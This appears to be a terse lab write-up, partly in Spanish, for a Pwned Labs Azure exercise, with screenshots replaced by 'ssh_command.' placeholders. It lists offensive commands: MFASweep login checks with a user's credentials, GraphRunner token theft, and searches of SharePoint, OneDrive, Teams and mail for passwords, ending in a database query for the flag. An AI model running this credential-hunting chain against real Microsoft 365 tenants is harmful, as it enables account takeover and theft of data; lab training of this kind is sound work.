Loot exchange teams sharepoint graphrunner

Loot exchange teams sharepoint graphrunner


Azure PwnedLabs

ssh_command.

Invoke-MFASweep -Username Clara.Miller@megabigtech.com -Password REDACTED -Recon -IncludeADFS

ssh_command.

az login -u Clara.Miller@megabigtech.com -p REDACTED

az account show | jq -r {tenatnId}

ssh_command.

Get-MgUserLicenseDetail -UserId “Clara.Miller@megabigtech.com

ssh_command.

Import-Module /opt/GraphRunner/GraphRunner.ps1

ssh_command.

Get-GraphTokens

ssh_command.

ssh_command.

ssh_command.

ssh_command.

Si queremos ver el token solo escribimos

$tokens

Si quieres refrescar el token

$tokens.refresh_token

Get-Help Invoke-SearchSharePointAndOneDrive -examples

ssh_command.

Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm ‘password’

ssh_command.

Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm ‘bonus’

ssh_command.

ssh_command.

Invoke-SearchTeams -Tokens $tokens -SearchTerm password

ssh_command.

Usamos la contrasena openme123! para abrir el documento.

ssh_command.

Invoke-SearchMailbox -Tokens $tokens -SearchTerm “password” -MessageCount 40

ssh_command.

ssh_command.

Iniciamos visual studio code.

code .

ssh_command.

Llenamos el formulario despues de instalar la extension llamada SQL Server.

ssh_command.

select * from subscribers

ssh_command.

Y encontramos el flag.

ssh_command.

© 2026 Cu3rv0x